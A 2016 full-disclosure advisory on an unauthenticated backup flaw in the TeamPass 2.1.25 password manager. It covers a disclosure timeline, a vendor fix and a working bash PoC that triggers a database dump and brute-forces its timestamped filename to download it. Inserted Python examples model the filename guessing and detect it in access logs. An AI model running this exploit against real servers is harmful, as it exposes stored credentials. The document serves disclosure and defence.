
List:       full-disclosure
Subject:    [FD] Teampass v2.1.25 - Unauthenticated Access Vulnerability
From:       Vulnerability Lab <research () vulnerability-lab ! com>
Date:       2016-05-25 8:48:48
Message-ID: e1b3531f-c114-5f97-facd-b6fdb237f290 () vulnerability-lab ! com

Document Title:
===============
Teampass v2.1.25 - Unauthenticated Access Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1844


Release Date:
=============
2016-05-18


Vulnerability Laboratory ID (VL-ID):
====================================
1844


Common Vulnerability Scoring System:
====================================
6.8


Product & Service Introduction:
===============================
TeamPass is a Passwords Manager dedicated for managing passwords in a collaborative way on any server Apache, MySQL and PHP. It is especially designed to provide passwords access security for allowed people.

(Copy of the Homepage: http://teampass.net/ )


Abstract Advisory Information:
==============================
An independent Vulnerability Laboratory researcher discovered an unauthenticated access vulnerability in the official Teampass v2.1.25 application.


Vulnerability Disclosure Timeline:
==================================
2016-05-11: Researcher Notification & Coordination (Peter Kok)
2016-05-12: Vendor Notification (Teampass Security Team)
2016-05-12: Vendor Response/Feedback (Teampass Security Team)
2016-05-13: Vendor Fix/Patch (Teampass Developer Team)
2016-05-18: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Vendor:  Nils Laumaillé
Product: Teampass Password Manager - Online Service (Web-Application) 2.1.25


Exploitation Technique:
=======================
Remote


Severity Level:
===============
High


Technical Details & Description:
================================
An unauthenticated access vulnerability has been discovered in the official Teampass v2.1.25 application. The vulnerability gives a remote attacker unauthenticated access to sensitive database management system information.

The script /backups/script.backup.php allows administrators to create database backups. There are three problems with this script:
- no authentication is needed to run the script
- the backups are stored inside the webroot, in the /backups directory
- the backup file name is predictable, as by default it is bck_cpassman-[epoch time].sql

These backups contain a lot of sensitive data: usernames, hashed passwords, description fields with information, etc. Although most of the passwords inserted by users are hashed, some secrets are visible in clear text, such as:
- the database password
- the clear text passwords for the SMTP and LDAP connections in the teampass_misc table

The security risk of the vulnerability is estimated as high, with a CVSS (Common Vulnerability Scoring System) score of 6.8. Exploitation of the web vulnerability requires neither a privileged web-application user account nor user interaction. Successful exploitation of the vulnerability results in unauthenticated access to database dumps and to the database contents they hold.
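The file-name prediction that makes the issue exploitable, as an added example in Python (not TeamPass code and not the advisory's PoC). It assumes the login page prints the server clock as YYYY-MM-DD HH:MM:SS on the line carrying the "fa fa-clock-o" icon (the PoC only takes the last token of that line; the exact markup is not in the advisory), that the server's UTC offset is a whole number of hours, and it uses a constructed page fragment as input. The sweep over offsets is bounded to -12..+14 hours instead of the PoC's open-ended loop.

```python
# Added example (not TeamPass code and not the advisory's PoC): model the
# attacker's file-name prediction from the advisory and show how small the
# search space is once the server clock has been read from the login page.
import re
import secrets
from datetime import datetime, timedelta, timezone

BACKUP_PREFIX = "bck_cpassman"  # default prefix named in the advisory

# Assumption (not stated in the advisory): the login page prints the server
# clock as "YYYY-MM-DD HH:MM:SS" on the same line as the "fa fa-clock-o" icon.
CLOCK_RE = re.compile(r"(\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})")


def parse_server_clock(html):
    """Return the server clock shown on the login page as a naive datetime.

    Like the PoC, this only looks at the line carrying the clock icon; the
    surrounding tags are stripped before the timestamp is searched for.
    """
    for line in html.splitlines():
        if "fa fa-clock-o" not in line:
            continue
        text = re.sub(r"<[^>]+>", " ", line)
        match = CLOCK_RE.search(text)
        if match:
            return datetime.strptime(match.group(1), "%Y-%m-%d %H:%M:%S")
    return None


def candidate_names(before, after, tz_hours=range(-12, 15)):
    """All file names the dump may have been written under.

    `before`/`after` are the naive server clock read before and after the
    request to script.backup.php. The name embeds PHP's time(), i.e. a UTC
    epoch, while the displayed clock is in the server's unknown local zone,
    so the naive window is converted to an epoch once per plausible UTC
    offset (whole hours only, as the PoC's +/-3600 s stepping assumes).
    """
    names = []
    for hours in tz_hours:
        zone = timezone(timedelta(hours=hours))
        start = int(before.replace(tzinfo=zone).timestamp())
        end = int(after.replace(tzinfo=zone).timestamp())
        for epoch in range(start, end + 1):
            names.append(f"{BACKUP_PREFIX}-{epoch}.sql")
    return names


def candidate_urls(base_url, before, after):
    """The URLs an attacker would request, in sweep order."""
    return [f"{base_url.rstrip('/')}/backups/{name}"
            for name in candidate_names(before, after)]


def unpredictable_backup_name():
    """Contrast: 256 bits of randomness instead of a 1-second-resolution
    clock. A name like this cannot be guessed, but it does not replace an
    authentication check or a storage location outside the webroot."""
    return f"{BACKUP_PREFIX}-{secrets.token_urlsafe(32)}.sql"


# Constructed sample: a login page fragment with the clock, as the PoC
# expects to grep it; the real TeamPass markup may differ.
SAMPLE_LOGIN_HTML = """<div id="footer">
<i class="fa fa-clock-o"></i>&nbsp;2016-05-18 10:00:00
</div>"""

if __name__ == "__main__":
    before = parse_server_clock(SAMPLE_LOGIN_HTML)
    after = before + timedelta(seconds=2)  # the backup took about 2 s
    urls = candidate_urls("https://teampass.example", before, after)
    print(f"{len(urls)} candidate URLs, first: {urls[0]}")
```

With a two-second backup window the whole sweep is 81 requests (3 seconds times 27 offsets), which is why a burst of 404s under /backups/ followed by a single 200 is the pattern to look for in access logs.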

Vulnerable Module(s):
			[+] ./backups/

Vulnerable File(s):
			[+] script.backup.php


Proof of Concept (PoC):
=======================
The vulnerability can be exploited by remote attackers without user interaction or a privileged user account. For a security demonstration, or to reproduce the issue, follow the information and steps provided below.

PoC: Exploit
#!/bin/bash

# /backups/script.backup.php in Teampass 2.1.25 and earlier allows unauthenticated access.
# The default Teampass database backup filename is bck_cpassman-[current epoch time].sql and
# it is stored in the backups directory.
# The only thing we have to do is find the epoch time at which the database backup was generated.
# First the script gets the server time from the index.php page, then runs script.backup.php
# to create the backup, and again gets the current server time from index.php.
# As we now know in which period the backup was created, we can guess the filename.

BACKUPFILENAME=bck_cpassman

if [ ! "$1" ]
then
    echo "Usage: $0 [url] [options]"
    echo -e "\nOptions:"
    echo -e "\t--increase\tincrease timezone until backup is found (default)"
    echo -e "\t--decrease\tdecrease timezone until backup is found"
    exit 0
fi

# get the current server time from the login page before generating the backup
S_SERVERTIME=$(curl -k -s "$1/" | grep "fa fa-clock-o" | rev | awk '{ print $1 }' | rev)
S_EPOCHTIME=$(date +%s -d "$S_SERVERTIME")

# generate the backup (no authentication required)
curl -k "$1/backups/script.backup.php"

# get the current server time from the login page after generating the backup
E_SERVERTIME=$(curl -k -s "$1/" | grep "fa fa-clock-o" | rev | awk '{ print $1 }' | rev)
E_EPOCHTIME=$(date +%s -d "$E_SERVERTIME")

while :
do
    i=$S_EPOCHTIME
    while [ "$i" -le "$E_EPOCHTIME" ]
    do
        echo -n "Trying to download $1/backups/$BACKUPFILENAME-$i.sql   "
        if curl -k -s -f --output /dev/null "$1/backups/$BACKUPFILENAME-$i.sql"
        then
            echo "[+] DATABASE BACKUP FOUND!"
            echo -e "\n>>> Database backup available at: $1/backups/$BACKUPFILENAME-$i.sql <<<\n\n"
            exit 0
        else
            echo "[-] not available"
        fi
        i=$((i+1))
    done

    # not found in this window: shift the whole window by one hour, because the
    # displayed server clock may be in a different timezone than date(1) assumed
    if [ "$2" == "--decrease" ]
    then
        S_EPOCHTIME=$((S_EPOCHTIME-3600))
        E_EPOCHTIME=$((E_EPOCHTIME-3600))
    else
        S_EPOCHTIME=$((S_EPOCHTIME+3600))
        E_EPOCHTIME=$((E_EPOCHTIME+3600))
    fi
    echo "Testing with different timezone ($(date -d @$S_EPOCHTIME))"
done


Solution - Fix & Patch:
=======================
Note: The manufacturer fixed the vulnerability; an update is available for download as version 2.1.26.
URL: http://teampass.net/2016-05-13-release-2.1.26
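Detection for the exploitation pattern described above, as an added example (not TeamPass code and not part of the vendor's fix): a small parser for Apache combined-format access logs and rules that flag the request to /backups/script.backup.php and the guessing of bck_cpassman-<epoch>.sql names. The log lines are constructed for the example; the paths and names follow the advisory's defaults, and the enumeration threshold of five misses is an arbitrary choice.

```python
# Added example (not TeamPass code): detection logic for the advisory's
# exploitation pattern, run over constructed Apache combined-format log lines.
# Assumptions: default /backups path and bck_cpassman-<epoch>.sql naming; any
# request to script.backup.php is suspicious because the script itself does
# not authenticate the caller.
import re
from collections import defaultdict

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
BACKUP_SCRIPT = "/backups/script.backup.php"
DUMP_RE = re.compile(r"^/backups/bck_cpassman-\d+\.sql$")


def parse_line(line):
    """Parse one access-log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ev = m.groupdict()
    ev["path"] = ev["path"].split("?", 1)[0]  # drop any query string
    return ev


def detect(lines, enum_threshold=5):
    """Return findings as (ip, kind, detail) tuples.

    kinds: backup_triggered  - script.backup.php was requested
           dump_downloaded   - a bck_cpassman-*.sql was served with 200
           dump_enumeration  - at least enum_threshold non-200 responses
                               for dump names from one client
    A dump_downloaded from a client that never requested the script is
    still reported: the dump may have been created by someone else.
    """
    findings = []
    misses = defaultdict(int)
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        if ev["path"] == BACKUP_SCRIPT:
            findings.append((ev["ip"], "backup_triggered",
                             f'{ev["ts"]} status {ev["status"]}'))
        elif DUMP_RE.match(ev["path"]):
            if ev["status"] == "200":
                findings.append((ev["ip"], "dump_downloaded", ev["path"]))
            else:
                misses[ev["ip"]] += 1
    for ip, n in misses.items():
        if n >= enum_threshold:
            findings.append((ip, "dump_enumeration",
                             f"{n} non-200 responses for dump names"))
    return findings


# Constructed sample log: one benign visitor, then one client that triggers
# the backup, guesses five names, and downloads the sixth.
SAMPLE_LOG = """\
10.0.0.5 - - [18/May/2016:10:00:00 +0200] "GET /index.php HTTP/1.1" 200 5123
203.0.113.7 - - [18/May/2016:10:00:01 +0200] "GET /backups/script.backup.php HTTP/1.1" 200 12
203.0.113.7 - - [18/May/2016:10:00:03 +0200] "GET /backups/bck_cpassman-1463565600.sql HTTP/1.1" 404 209
203.0.113.7 - - [18/May/2016:10:00:03 +0200] "GET /backups/bck_cpassman-1463565601.sql HTTP/1.1" 404 209
203.0.113.7 - - [18/May/2016:10:00:03 +0200] "GET /backups/bck_cpassman-1463565602.sql HTTP/1.1" 404 209
203.0.113.7 - - [18/May/2016:10:00:04 +0200] "GET /backups/bck_cpassman-1463562000.sql HTTP/1.1" 404 209
203.0.113.7 - - [18/May/2016:10:00:04 +0200] "GET /backups/bck_cpassman-1463562001.sql HTTP/1.1" 404 209
203.0.113.7 - - [18/May/2016:10:00:04 +0200] "GET /backups/bck_cpassman-1463558401.sql HTTP/1.1" 200 884211
""".splitlines()

if __name__ == "__main__":
    for ip, kind, detail in detect(SAMPLE_LOG):
        print(f"{ip}\t{kind}\t{detail}")
```

The backup_triggered rule is the important one even when no dump is later fetched: the script writes the dump into the webroot regardless of who called it, so every hit should be followed by checking the /backups directory and removing any files found there.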


Security Risk:
==============
The security risk of the vulnerability in the Teampass application is estimated as high (CVSS 6.8).


Credits & Authors:
==================
Peter Kok -  [http://www.vulnerability-lab.com/show.php?user=Peter%20Kok]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.

Domains:    www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact:    admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section:    magazine.vulnerability-lab.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social:     twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php

Any modified copy or reproduction, including partial usage, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@vulnerability-lab.com) to ask for permission.

				    Copyright  © 2016 | Vulnerability Laboratory - [Evolution Security GmbH]™




-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com


_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

